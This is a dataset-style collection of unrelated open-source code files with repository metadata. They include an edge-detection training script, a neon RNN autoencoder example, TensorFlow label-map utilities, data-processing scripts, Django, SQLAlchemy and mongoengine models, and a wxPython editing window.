    parser.add_argument('--batch-size', type=int, default=8, metavar='B',
                        help='the mini-batch size (default: 2)')
    parser.add_argument('--num-workers', default=8, type=int,
                        help='the number of workers for the dataloader.')
    parser.add_argument('--tensorboard', action='store_true', default=True,
                        help='use tensorboard for logging purposes')
    parser.add_argument('--gpu', type=str, default='1',
                        help='select GPU')
    parser.add_argument('--img_width', type = int, default = 400, help='image size for training')
    parser.add_argument('--img_height', type = int, default = 400, help='image size for training')
    parser.add_argument('--channel_swap', default=[2, 1, 0], type=int)
    parser.add_argument('--crop_img', default=False, type=bool,
                        help='If true crop training images, other ways resizing')
    parser.add_argument('--mean_pixel_values', default=[104.00699, 116.66877, 122.67892, 137.86],
                        type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892]
    args = parser.parse_args()

    tb_writer = None
    if args.tensorboard and not args.is_testing:
        from tensorboardX import SummaryWriter  # previous torch version
        # from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greather
        tb_writer = SummaryWriter(log_dir=args.output_dir)

    print(" **** You have available ", torch.cuda.device_count(), "GPUs!")
    print("Pytorch version: ", torch.__version__)
    os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
    device = torch.device('cpu' if torch.cuda.device_count() == 0 else 'cuda')

    model = DexiNet().to(device)
    # model = nn.DataParallel(model)
    model.apply(weight_init)

    # BUG FIX: build the validation set unconditionally — it is used by both
    # the testing branch below and the training loop's validation step.
    dataset_val = testDataset(args.input_val_dir, arg=args)
    dataloader_val = DataLoader(dataset_val, batch_size=args.batch_size,
                                shuffle=False, num_workers=args.num_workers)
    if not args.is_testing:
        dataset_train = BipedMyDataset(args.input_dir, train_mode='train',
                                       arg=args)
        dataloader_train = DataLoader(dataset_train, batch_size=args.batch_size,
                                      shuffle=True, num_workers=args.num_workers)

    # for testing: load the checkpoint, dump predictions and exit.
    if args.is_testing:
        model.load_state_dict(torch.load(os.path.join(args.output_dir,args.checkpoint_data), map_location=device))
        model.eval()
        output_dir = os.path.join(args.res_dir, "BIPED2" + args.test_data)
        with torch.no_grad():
            for batch_id, sample_batched in enumerate(dataloader_val):
                images = sample_batched['images'].to(device)
                if not args.test_data == "CLASSIC":
                    labels = sample_batched['labels'].to(device)
                file_names = sample_batched['file_names']
                image_shape = sample_batched['image_shape']
                print("input image size: ",images.shape)
                output = model(images)
                save_image_batch_to_disk(output, output_dir, file_names,image_shape, arg=args)
        print("Testing ended in ",args.test_data, "dataset")
        sys.exit()

    criterion = weighted_cross_entropy_loss
    optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=1e-4)
    # Learning rate scheduler.
    # lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize,
    #                               gamma=args.lr_gamma)
    for epoch in range(args.num_epochs):
        # Per-epoch output directories for checkpoints and preview images.
        output_dir_epoch = os.path.join(args.output_dir, str(epoch))
        img_test_dir = os.path.join(output_dir_epoch,args.test_data+'_res')
        create_directory(output_dir_epoch)
        create_directory(img_test_dir)
        train(epoch, dataloader_train, model, criterion, optimizer, device,
              args.log_interval_vis, tb_writer, args=args)
        # lr_schd.step() # decay lr at the end of the epoch.
        with torch.no_grad():
            validation(epoch, dataloader_val, model, device, img_test_dir,arg=args)
        # Support both plain and DataParallel-wrapped models when saving.
        try:
            net_state_dict = model.module.state_dict()
        except:
            net_state_dict = model.state_dict()
        torch.save(net_state_dict, os.path.join(
            output_dir_epoch, '{0}_model.pth'.format(epoch)))
if __name__ == '__main__':
main()
| [
"sashashengyt@gmail.com"
] | sashashengyt@gmail.com |
5ec786f6620462f9179a0a659728a5f293abe6a9 | 0cef8deb473ffac47344dd46039b9f962d9d0ccf | /examples/ptb/char_rae.py | 5ceecf3aa2af2408ab7043f68c70848b8c46f69a | [
"Apache-2.0"
] | permissive | NervanaSystems/ngraph-neon | 6045d51b6c67348b0df8cbe051253543b691f29d | 3d17f06ae723ec5c2e3a52c9c840b4d6c7640f22 | refs/heads/master | 2023-06-22T02:54:20.143134 | 2023-01-03T22:54:35 | 2023-01-03T22:54:35 | 83,846,593 | 14 | 6 | Apache-2.0 | 2022-10-17T03:51:08 | 2017-03-03T22:19:31 | Python | UTF-8 | Python | false | false | 6,826 | py | #!/usr/bin/env python
# ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
"""
Character-level recurrent autoencoder. This model shows how to build an Encoder-Decoder style RNN.
The model uses a sequence from the PTB dataset as input, and learns to output
the same sequence in reverse order.
"""
import numpy as np
from contextlib import closing
import neon as ng
from neon.frontend import Layer, Preprocess, Recurrent, Affine, Softmax, Tanh
from neon.frontend import UniformInit, RMSProp
from neon.frontend import ax, loop_train
from neon.frontend import NeonArgparser, make_bound_computation, make_default_callbacks
from neon.frontend import SequentialArrayIterator
import neon.transformers as ngt
from neon.frontend import PTB
# parse the command line arguments
parser = NeonArgparser(__doc__)
parser.set_defaults(batch_size=128, num_iterations=2000)
args = parser.parse_args()

# model parameters
time_steps = 5          # sequence length fed to the encoder / decoder
hidden_size = 256       # width of the recurrent hidden state
gradient_clip_value = 5

# download penn treebank
# set shift_target to be False, since it is going to predict the same sequence
tree_bank_data = PTB(path=args.data_dir, shift_target=False)
ptb_data = tree_bank_data.load_data()
# reverse_target=True: the model learns to emit the input sequence reversed;
# get_prev_target=True: the decoder is also fed the previous target token.
train_set = SequentialArrayIterator(ptb_data['train'],
                                    batch_size=args.batch_size,
                                    time_steps=time_steps,
                                    total_iterations=args.num_iterations,
                                    reverse_target=True,
                                    get_prev_target=True)
valid_set = SequentialArrayIterator(ptb_data['valid'],
                                    batch_size=args.batch_size,
                                    time_steps=time_steps,
                                    total_iterations=10,
                                    reverse_target=True,
                                    get_prev_target=True)
inputs = train_set.make_placeholders()
# vocabulary axis length = number of distinct characters
ax.Y.length = len(tree_bank_data.vocab)
def generate_samples(inputs, encode, decode, num_time_steps):
    """Greedily decode a reversed sequence from the encoder's final state.

    Runs the encoder once over *inputs*, then feeds the decoder one step at a
    time: at each step the argmax token is selected, one-hot re-encoded and
    fed back as the next decoder input.

    Returns an array of sampled token indices, one row per batch element.
    """
    context = encode(inputs)
    step_input = np.zeros(decode.computation_op.parameters[0].axes.lengths)
    hidden = context
    generated = []
    for _ in range(num_time_steps):
        probs, hidden = decode(step_input, hidden.squeeze())
        best = np.argmax(probs, axis=0)
        # feed the chosen token back in as a one-hot vector
        step_input[:] = 0
        step_input[best] = 1
        generated.append(best)
    return np.squeeze(np.array(generated)).T
def expand_onehot(x):
    """One-hot encode integer token ids *x* along the vocabulary axis ax.Y."""
    return ng.one_hot(x, axis=ax.Y)
# weight initialization
init = UniformInit(low=-0.08, high=0.08)

# model initialization: encoder consumes the input sequence and returns only
# its final state; the decoder unrolls from that state over the full sequence.
one_hot_enc = Preprocess(functor=expand_onehot)
enc = Recurrent(hidden_size, init, activation=Tanh(), reset_cells=True, return_sequence=False)
one_hot_dec = Preprocess(functor=expand_onehot)
dec = Recurrent(hidden_size, init, activation=Tanh(), reset_cells=True, return_sequence=True)
linear = Affine(init, activation=Softmax(), bias_init=init, axes=(ax.Y))

optimizer = RMSProp(decay_rate=0.95, learning_rate=2e-3, epsilon=1e-6,
                    gradient_clip_value=gradient_clip_value)

# build network graph
one_hot_enc_out = one_hot_enc(inputs['inp_txt'])
one_hot_dec_out = one_hot_dec(inputs['prev_tgt'])
enc_out = enc(one_hot_enc_out)
# decoder is seeded with the encoder's final state (encoder-decoder RNN)
dec_out = dec(one_hot_dec_out, init_state=enc_out)
output_prob = linear(dec_out)
loss = ng.cross_entropy_multi(output_prob,
                              ng.one_hot(inputs['tgt_txt'], axis=ax.Y),
                              usebits=True)
mean_cost = ng.mean(loss, out_axes=[])
updates = optimizer(loss)

train_outputs = dict(batch_cost=mean_cost, updates=updates)
loss_outputs = dict(cross_ent_loss=loss)

# inference graph: single-step decoder driven from explicit placeholders so
# generate_samples() can feed tokens back one step at a time.
with Layer.inference_mode_on():
    enc_out_inference = enc(one_hot_enc_out)
    # Create decoder placeholders with a length-1 recurrent axis
    axes = one_hot_dec_out.axes
    axes = axes - axes.recurrent_axis() + ng.make_axis(length=1, name="REC")
    decoder_input_inference = ng.placeholder(axes, name="input")
    decoder_state_inference = ng.placeholder(enc_out_inference.axes, name="state")
    dec_out_inference = dec(decoder_input_inference, init_state=decoder_state_inference)
    inference_out = linear(dec_out_inference)
encoder_computation = ng.computation(enc_out_inference, inputs["inp_txt"])
decoder_computation = ng.computation([inference_out, dec_out_inference],
                                     decoder_input_inference,
                                     decoder_state_inference)

######################
# Train Loop
# Now bind the computations we are interested in
with closing(ngt.make_transformer()) as transformer:
    # training computations
    train_computation = make_bound_computation(transformer, train_outputs, inputs)
    loss_computation = make_bound_computation(transformer, loss_outputs, inputs)

    cbs = make_default_callbacks(transformer=transformer,
                                 output_file=args.output_file,
                                 frequency=args.iter_interval,
                                 train_computation=train_computation,
                                 total_iterations=args.num_iterations,
                                 eval_set=valid_set,
                                 loss_computation=loss_computation,
                                 use_progress_bar=args.progress_bar)
    # inference computations
    encoder_function = transformer.add_computation(encoder_computation)
    decoder_function = transformer.add_computation(decoder_computation)

    # training
    loop_train(train_set, cbs)

    # inference: greedily decode the validation set and count token errors
    valid_set.reset()
    num_errors = 0
    for mb_idx, data in enumerate(valid_set):
        tokens = generate_samples(data["inp_txt"], encoder_function, decoder_function, time_steps)
        num_errors += len(np.argwhere(tokens != data["tgt_txt"]))
    num_total = valid_set.total_iterations * (time_steps * args.batch_size)
    print('Misclassification error: {} %'.format(float(num_errors) / num_total * 100))

    # print some samples (un-reversed, from the last minibatch decoded above)
    for sample_idx in range(5):
        print(''.join([tree_bank_data.vocab[i] for i in tokens[sample_idx, :]])[::-1])
"sang.ik.lee@intel.com"
] | sang.ik.lee@intel.com |
0e6b15d493b10254f9e208b5e71756058f247465 | 84f073856c8665b0f8b813a46a38f96ccd4f2790 | /object_detection/utils/label_map_util.py | c5e5c86fb326b6e7ce16928714c3540fbed82932 | [] | no_license | fengrk/ml_tools | ad9336e47447e9a0f63ba7fc2e86c7eea51c955e | 70e634250455ff6f3aeb826e781b8096adbdc066 | refs/heads/master | 2023-07-19T15:34:46.780323 | 2019-03-02T03:59:53 | 2019-03-02T03:59:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,442 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Label map utility functions."""
import logging
import tensorflow as tf
from google.protobuf import text_format
from ml_tools.object_detection.protos import string_int_label_map_pb2
def _validate_label_map(label_map):
"""Checks if a label map is valid.
Args:
label_map: StringIntLabelMap to validate.
Raises:
ValueError: if label map is invalid.
"""
for item in label_map.item:
if item.id < 0:
raise ValueError('Label map ids should be >= 0.')
if (item.id == 0 and item.name != 'background' and
item.display_name != 'background'):
raise ValueError('Label map id 0 is reserved for the background label')
def create_category_index(categories):
  """Key a list of COCO-style category dicts by their 'id' field.

  Args:
    categories: a list of dicts, each of which has the following keys:
      'id': (required) an integer id uniquely identifying this category.
      'name': (required) string representing category name
        e.g., 'cat', 'dog', 'pizza'.

  Returns:
    A dict mapping each category's 'id' to the category dict itself.
  """
  return {category['id']: category for category in categories}
def get_max_label_map_index(label_map):
  """Return the largest item id present in *label_map*.

  Args:
    label_map: a StringIntLabelMapProto

  Returns:
    The maximum id as an integer.
  """
  all_ids = [entry.id for entry in label_map.item]
  return max(all_ids)
def convert_label_map_to_categories(label_map,
                                    max_num_classes,
                                    use_display_name=True):
  """Build an eval-compatible categories list from a label map proto.

  Each returned entry is a dict with:
    'id': integer category id.
    'name': category name, taken from `display_name` when requested and
      present, otherwise from `name`.

  Items whose id falls outside (0, max_num_classes] are skipped (with an
  info log), and only the first item for any given id is kept.  When
  `label_map` is None, a default list of `max_num_classes` placeholder
  categories is produced.

  Args:
    label_map: a StringIntLabelMapProto or None.
    max_num_classes: maximum number of (consecutive) label indices to include.
    use_display_name: (boolean) whether to prefer the 'display_name' field
      over 'name' as the category name.

  Returns:
    categories: a list of dictionaries representing all possible categories.
  """
  if not label_map:
    label_id_offset = 1
    return [{'id': index + label_id_offset,
             'name': 'category_{}'.format(index + label_id_offset)}
            for index in range(max_num_classes)]
  categories = []
  seen_ids = []
  for item in label_map.item:
    if not 0 < item.id <= max_num_classes:
      logging.info(
          'Ignore item %d since it falls outside of requested '
          'label range.', item.id)
      continue
    if use_display_name and item.HasField('display_name'):
      category_name = item.display_name
    else:
      category_name = item.name
    if item.id not in seen_ids:
      seen_ids.append(item.id)
      categories.append({'id': item.id, 'name': category_name})
  return categories
def load_labelmap(path):
  """Parse and validate a StringIntLabelMap proto from a file.

  The file contents are first interpreted as a text-format proto; if that
  fails, they are re-parsed as a serialized binary proto.

  Args:
    path: path to StringIntLabelMap proto file (text or binary).

  Returns:
    The parsed and validated StringIntLabelMapProto.
  """
  label_map = string_int_label_map_pb2.StringIntLabelMap()
  with tf.gfile.GFile(path, 'r') as label_file:
    raw_contents = label_file.read()
  try:
    text_format.Merge(raw_contents, label_map)
  except text_format.ParseError:
    label_map.ParseFromString(raw_contents)
  _validate_label_map(label_map)
  return label_map
def get_label_map_dict(label_map_path,
                       use_display_name=False,
                       fill_in_gaps_and_background=False):
  """Reads a label map and returns a dictionary of label names to id.

  Args:
    label_map_path: path to StringIntLabelMap proto text file.
    use_display_name: whether to use the label map items' display names as keys.
    fill_in_gaps_and_background: whether to fill in gaps and background with
      respect to the id field in the proto. The id: 0 is reserved for the
      'background' class and will be added if it is missing. All other missing
      ids in range(1, max(id)) will be added with a dummy class name
      ("class_<id>") if they are missing.

  Returns:
    A dictionary mapping label names to id.

  Raises:
    ValueError: if fill_in_gaps_and_background and label_map has non-integer or
      negative values.
  """
  label_map = load_labelmap(label_map_path)
  label_map_dict = {}
  for item in label_map.item:
    if use_display_name:
      label_map_dict[item.display_name] = item.id
    else:
      label_map_dict[item.name] = item.id
  if fill_in_gaps_and_background:
    # NOTE(review): `values` is snapshotted BEFORE the background id 0 may be
    # inserted below, so the validation and gap checks deliberately(?) ignore
    # the injected background entry — confirm before restructuring.
    values = set(label_map_dict.values())

    if 0 not in values:
      label_map_dict['background'] = 0
    if not all(isinstance(value, int) for value in values):
      # NOTE(review): this error message is missing a space between
      # "order to" and "fill_in..." due to implicit string concatenation.
      raise ValueError('The values in label map must be integers in order to'
                       'fill_in_gaps_and_background.')
    if not all(value >= 0 for value in values):
      raise ValueError('The values in the label map must be positive.')

    if len(values) != max(values) + 1:
      # there are gaps in the labels, fill in gaps.
      # range(1, max) suffices because max itself is known to be present.
      for value in range(1, max(values)):
        if value not in values:
          label_map_dict['class_' + str(value)] = value

  return label_map_dict
def create_categories_from_labelmap(label_map_path, use_display_name=True):
  """Load a label map file and convert it to an eval-compatible list.

  Each entry in the returned list is a dict with:
    'id': an integer id uniquely identifying this category.
    'name': string representing category name e.g., 'cat', 'dog'.

  Args:
    label_map_path: Path to `StringIntLabelMap` proto text file.
    use_display_name: (boolean) choose whether to load 'display_name' field
      as category name. If False or if the display_name field does not exist,
      uses 'name' field as category names instead.

  Returns:
    categories: a list of dictionaries representing all possible categories.
  """
  parsed_map = load_labelmap(label_map_path)
  num_classes = max(item.id for item in parsed_map.item)
  return convert_label_map_to_categories(parsed_map, num_classes,
                                         use_display_name)
def create_category_index_from_labelmap(label_map_path, use_display_name=True):
  """Load a label map file and return it as a category index.

  Args:
    label_map_path: Path to `StringIntLabelMap` proto text file.
    use_display_name: (boolean) choose whether to load 'display_name' field
      as category name. If False or if the display_name field does not exist,
      uses 'name' field as category names instead.

  Returns:
    A category index: a dict mapping integer ids to category dicts, e.g.
    {1: {'id': 1, 'name': 'dog'}, 2: {'id': 2, 'name': 'cat'}, ...}
  """
  category_list = create_categories_from_labelmap(label_map_path,
                                                  use_display_name)
  return create_category_index(category_list)
def create_class_agnostic_category_index():
  """Return a category index whose only entry is a generic `object` class."""
  object_category = {'id': 1, 'name': 'object'}
  return {object_category['id']: object_category}
| [
"frkhit@gmail.com"
] | frkhit@gmail.com |
e8041325e5a03187eca417efcb61e8e3c5da43ac | 59144f1514d0e546000848661effc7a503e109ed | /python/add_file.py | 2666a2744e64fcf7a7aa3320e8664073599639fd | [] | no_license | rahul-pathak-12/Capture-Point-Modelling | b7231f708e67c8bc88404bb2f29c145421ea98e0 | cbcbb2458c807c53d0a1c7139d21ad204c9564c3 | refs/heads/main | 2022-12-25T15:08:27.038837 | 2020-10-12T21:29:55 | 2020-10-12T21:29:55 | 303,515,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,408 | py | import os
from os import listdir
from os.path import isfile, join
from sklearn import preprocessing
import numpy as np
import pandas as pd
VERSION = "TRAIN"
DIR_ORIGIN = "C:\\Users\\User\\Desktop\\RAW_DATA\\\STEP_MODELLING\\" + VERSION + "\\"
DIR_DEST = "C:\\Users\\User\\Desktop\\RAW_DATA\\\STEP_MODELLING_PROCESSED\\" + VERSION + "\\"
files = [ f for f in listdir(DIR_ORIGIN) ]
#This is V_SACRAL -> X1 in the file
leg_length = {
'2': 0.88392578,
'3': 1.0372605,
'4': 1.0227856,
'5': 1.0670828,
'6': 1.0213803,
'7': 0.97300665,
'8': 0.91221417,
'9': 0.93919006,
}
for file in files:
fpath = DIR_ORIGIN + file
tpath = DIR_DEST + "ADJ_" + file
nfirstlines = []
with open( fpath ) as f:
df = pd.read_csv( fpath, sep='\t' )
mean = df["center_of_mass_Y"].mean()
rows = df.shape[0]
mean_update = [mean] * rows
df["AVERAGE_COMY"] = mean_update
subj = file[ 0 ]
height = leg_length[ subj ]
leg_length_update = [height] * rows
df["LEG_LENGTH"] = leg_length_update
comx = df["center_of_mass_X"][0]
comx_values = df["center_of_mass_X"] - comx
df["ADJ_COMX"] = comx_values
nfirstlines.append( next(f) )
df.to_csv( tpath, sep='\t', index_label = 'N' ) | [
"rahul.pathak@hotmail.com"
] | rahul.pathak@hotmail.com |
7ecc834bd42da9a9ef5316f8cbec45fb208fb2ac | 9e0e3a155f7f533b178d4ed31ae7a16050e414c2 | /edx-ai-week4-project-master/edx-ai-week4-project-master/KernelCalculator.py | 14d764b07feafc728556d44b59674f92415fd826 | [] | no_license | RudraNilBasu/edx_AI | 1c67595fbf4d12619e61282d88b7374dc01d9e98 | 5c80bb241b7d79cb6fdd9d331d03e8171a46e642 | refs/heads/master | 2021-08-22T08:42:16.809292 | 2017-11-29T19:40:22 | 2017-11-29T19:40:22 | 112,519,558 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | import FastGrid
from Util import Util
from UtilityCalculation import UtilityCalculator
class KernelCalculator(UtilityCalculator):
    """Scores a grid as the dot product of its board with a fixed kernel."""

    def __init__(self, create_snake=True, ramp_amplification=2.0):
        # Pre-compute the weighting kernel once; it is reused for every grid.
        self.kernel = Util.compute_kernel(create_snake=create_snake,
                                          ramp_amplification=ramp_amplification)

    def compute_utility(self, grid: FastGrid):
        """Return the kernel-weighted sum over the board cells."""
        total = 0
        for weight, cell in zip(self.kernel, grid.board):
            total += weight * cell
        return total
| [
"rudra.nil.basu.1996@gmail.com"
] | rudra.nil.basu.1996@gmail.com |
0fed331e4c8562a59ca97e427cf0565c82985187 | 9b2789e2933f67f7d089f71ffb1ea9a1b4745fca | /spider_project/spider_market/admin.py | 9cd5eeb9fe66ce95a5bd09273ea2ad17de606998 | [
"MIT"
] | permissive | Sam1808/SG | eaff1b9eca9c1a2f29bdb520a56e65d71c576a81 | 4352aebdc35b5d84be09863af5d85b843e039e20 | refs/heads/main | 2023-03-16T19:52:44.466833 | 2021-03-01T08:17:42 | 2021-03-01T08:17:42 | 331,236,041 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | from django.contrib import admin
from .models import Category
from .models import Company
from .models import Product
from .models import User
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
pass
@admin.register(Company)
class CompanyAdmin(admin.ModelAdmin):
pass
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
pass
@admin.register(User)
class UserAdmin(admin.ModelAdmin):
pass
| [
"Anton.Pozdnyakov.I@gmail.com"
] | Anton.Pozdnyakov.I@gmail.com |
d76f8ca07d1ad9d079c6e38cf85e61ef63f39ac2 | 91a64c5b90b04c1fc66f781da07b8ee6352f6260 | /api/models/twse_over_bought.py | c92ff8585695dab0fd7233afd04f2cf8cac00915 | [] | no_license | deersheep330/svc-api | 309949f046334beb52a70cb737276c60b798fd4b | a86008a9fbd5fa45f5809d142060c311e3a08625 | refs/heads/master | 2023-02-15T09:26:48.923293 | 2021-01-13T09:11:59 | 2021-01-13T09:11:59 | 322,479,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | from sqlalchemy import Column, String, Date, Integer, func, ForeignKey
from sqlalchemy.orm import relationship
from ..db import Base
class TwseOverBought(Base):
__tablename__ = 'twse_over_bought'
symbol = Column(String(16), ForeignKey('stock.symbol'), nullable=False, primary_key=True)
date = Column(Date, nullable=False, primary_key=True, server_default=func.sysdate())
quantity = Column(Integer, nullable=False)
stock = relationship('Stock')
def __repr__(self):
return str([getattr(self, c.name, None) for c in self.__table__.c])
| [
"yangchiu@inquartik.com"
] | yangchiu@inquartik.com |
13f1517af465f4f0433f3dd29f9e10ba786f7d8a | 15cd250ae98a0647f81a2eefcfd738b32f56170a | /EditarInformacion.py | 33f2e953489a6636a92c542330911f49d709f099 | [] | no_license | hernanarangoisaza/Efenergy_v2.0 | 21fed08d5497ebaa692d096b59954b15bd3154c5 | be4faadec77e4e3ab52f4dec5f89d25c061ab5f8 | refs/heads/master | 2023-01-22T03:05:05.682459 | 2020-11-25T13:32:48 | 2020-11-25T13:32:48 | 296,912,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,472 | py | from ArchivoInformacion import ArchivoInformacion
import wx
import easygui as eg
class EditarInformacion(wx.Frame):
def __init__(self, id, title, informacion, archivo_txt, ventana_inicio, identificador):
wx.Frame.__init__(self, None, id, title, size = (878, 350),pos=(0,0), style = wx.DEFAULT_FRAME_STYLE
& ~(wx.RESIZE_BORDER | wx.MAXIMIZE_BOX))
self.ventana_inicio = ventana_inicio
self.SetIcon(wx.Icon("Images/logo.png"))
self.panel = wx.Panel(self,-1)
self.archivo_txt = archivo_txt
self.informacion = informacion
self.identificador = identificador
self.SetBackgroundColour("#FFFFFF")
self.elementos()
def elementos(self):
nombre_variable = ["Voltaje","Potencia","Armónicos"]
panel = wx.Panel(self.panel, -1, size=(878,60), pos=wx.DefaultPosition)
txt_informacion = wx.StaticText(panel, -1, "Editar información de %s"% nombre_variable[self.identificador - 1], pos=(10, 10))
font = wx.Font(20, wx.ROMAN, wx.NORMAL, wx.NORMAL)
txt_informacion.SetFont(font)
txt_informacion.SetForegroundColour("#FFFFFF")
panel.SetBackgroundColour("#6E7B99")
txt_editar_norma = wx.StaticText(self.panel, -1, "Cambiar Archivo PDF:", pos=(650, 70))
font = wx.Font(10, wx.ROMAN, wx.NORMAL, wx.NORMAL)
txt_editar_norma.SetFont(font)
button_seleccionar = wx.Button(self.panel, -1, u"Seleccionar Norma", size=(130,30), pos=(680,100))
button_seleccionar.Bind(wx.EVT_BUTTON, self.on_seleccion_norma)
self.button_cargar = wx.Button(self.panel, -1, u"Cargar", size=(130,30), pos=(680,140))
self.button_cargar.Show(False)
self.button_cargar.Bind(wx.EVT_BUTTON, self.cargar_norma)
linea_separador = wx.StaticLine(self.panel, id=wx.ID_ANY, pos=(640,65), size=(2,240),
style=wx.LI_VERTICAL)
linea_separador.SetBackgroundColour("#6E7B99")
self.inp_informacion = wx.TextCtrl(self.panel, wx.ID_ANY, self.informacion, size=(600,200), pos=(30,70), style=wx.TE_MULTILINE)
button_editar = wx.BitmapButton( self.panel, wx.ID_ANY, wx.Bitmap(u"Images/icono_aceptar.png"), pos=(600,275), size=wx.DefaultSize, style=wx.BU_AUTODRAW|wx.NO_BORDER )
button_editar.SetBackgroundColour("#FFFFFF")
button_editar.Bind(wx.EVT_BUTTON, self.on_editar_informacion)
button_cancelar = wx.BitmapButton( self.panel, wx.ID_ANY, wx.Bitmap(u"Images/icono_cancelar.png"), pos=(30,275), size=wx.DefaultSize, style=wx.BU_AUTODRAW|wx.NO_BORDER )
button_cancelar.SetBackgroundColour("#FFFFFF")
button_cancelar.Bind(wx.EVT_BUTTON, self.on_cancelar)
def on_editar_informacion(self, event):
try:
confirmacion = self.msgPregunta("Desea guardar la información?")
if confirmacion == wx.ID_YES:
informacion = self.archivo_txt.leer_archivo()
if self.identificador == 1:
total_informacion = "%s\n&%s\n&%s" % (self.inp_informacion.GetValue(),informacion[1],informacion[2])
self.archivo_txt.escribir_archivo(total_informacion)
self.ventana_inicio.txt_informacion_voltaje.SetLabel(self.archivo_txt.leer_archivo()[0])
if self.identificador == 2:
total_informacion = "%s\n&%s\n&%s" % (informacion[0],self.inp_informacion.GetValue(),informacion[2])
self.archivo_txt.escribir_archivo(total_informacion)
self.ventana_inicio.txt_informacion_potencia.SetLabel(self.archivo_txt.leer_archivo()[1])
if self.identificador == 3:
total_informacion = "%s\n&%s\n&%s" % (informacion[0],informacion[1],self.inp_informacion.GetValue())
self.archivo_txt.escribir_archivo(total_informacion)
self.ventana_inicio.txt_informacion_armonico.SetLabel(self.archivo_txt.leer_archivo()[2])
self.msgInformacion("El texto de información se modificó correctamente")
self.Destroy()
except:
self.msgError("Ha ocurrido un Error al modificar la información")
def on_seleccion_norma(self, event):
try:
extension = ["*.pdf"]
a = None # dfgf
self.archivo = eg.fileopenbox(msg="Seleccionar PDF", title="Control", default=extension[0], filetypes=extension)
#eg.msgbox("Error en seleccion de archivo.\nEl archivo debe de ser extension xlsx", "Error", ok_button="Continuar")
if self.archivo != None:
self.button_cargar.Show( True )
else:
self.button_cargar.Show( False )
except:
self.msgError("Error al intentar seleccionar el archivo PDF")
def cargar_norma(self, event):
try:
import shutil
if self.identificador == 1:
shutil.copy(self.archivo, 'archivo/NormaVoltaje.pdf')
if self.identificador == 2:
shutil.copy(self.archivo, 'archivo/NormaPotencia.pdf')
if self.identificador == 3:
shutil.copy(self.archivo, 'archivo/NormaArmónico.pdf')
self.msgInformacion("Se cargo el archivo PDF correctamente")
self.button_cargar.Show( False )
except:
self.msgError("Error al cargar el archivo. \nPor favor verifique que el archivo seleccionado sea extensión .pdf ")
def on_cancelar(self, event):
confirmacion = self.msgPregunta("Realmente desea cancelar la operación?")
if confirmacion == wx.ID_YES:
self.Destroy()
def msgInformacion(self, mensaje):
box = wx.MessageDialog(None, mensaje, 'Información',style=wx.ICON_INFORMATION | wx.OK)
answer = box.ShowModal()
box.Destroy()
def msgError(self, mensaje):
box = wx.MessageDialog(None, mensaje, 'Error',style=wx.ICON_ERROR | wx.OK)
answer = box.ShowModal()
box.Destroy()
def msgPregunta(self, mensaje):
box = wx.MessageDialog(None, mensaje, 'Confirmación', style=wx.ICON_QUESTION|wx.YES_NO)
answer = box.ShowModal()
box.Destroy()
return answer | [
"31634784+hernanarangoisaza@users.noreply.github.com"
] | 31634784+hernanarangoisaza@users.noreply.github.com |
d823898501c02c05d1ae6ef25b3f53acb1993905 | 426d2c882d2e3197c3ae0426b85f29d61abb6367 | /src/algorithms/mock_ranking.py | 08ed5f75b785a5b78ba11663ac7fb839c0810336 | [] | no_license | pestefo/ra_recommendator_conrec | 9b5a0c1a6958ed3f0834c95b53939314394c5425 | 8274b4d6d7dbcda95a24a07c7a1acb9df6003163 | refs/heads/master | 2023-02-18T06:13:07.333750 | 2022-11-04T00:01:04 | 2022-11-04T00:01:04 | 153,520,188 | 2 | 0 | null | 2023-02-11T02:11:22 | 2018-10-17T20:34:08 | null | UTF-8 | Python | false | false | 583 | py | #!/usr/bin/env python
# coding: utf-8
from random import randint
from operator import itemgetter
class MockRanking:
ranking = None
def __init__(self):
MockRanking.ranking = []
MAX_NUM_USERS = 43872
MAX_SCORE = 2500
for i in range(1,150):
MockRanking.ranking.append((randint(1,MAX_NUM_USERS), randint(1,MAX_SCORE)))
MockRanking.ranking = sorted(MockRanking.ranking, key=itemgetter(1),reverse=True)
def ranking_for_question(self, question, limit_of_results=150):
return MockRanking.ranking[:limit_of_results] | [
"pestefo@gmail.com"
] | pestefo@gmail.com |
420170684f99d322af40a55732783f81fe0183aa | c1d6a5a715d198b556bc19240693a1621dd7f81b | /app/main/model/posts_model.py | bf6820ce99ec5fe40242db5d756e653808d1e6c2 | [] | no_license | clive1995/python-practice-proj | 0ff39e197a16a02a0d54c55d5abc7c086f05068a | 38e6010e265d0a62a16eb88ba063c0c8379a1dc9 | refs/heads/master | 2023-02-21T13:17:28.743815 | 2021-01-21T07:17:35 | 2021-01-21T07:17:35 | 327,896,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 768 | py | from .. import mdb
from .user_model import User
import datetime
class Likes(mdb.EmbeddedDocument):
userId = mdb.ReferenceField(User)
class Comments(mdb.EmbeddedDocument):
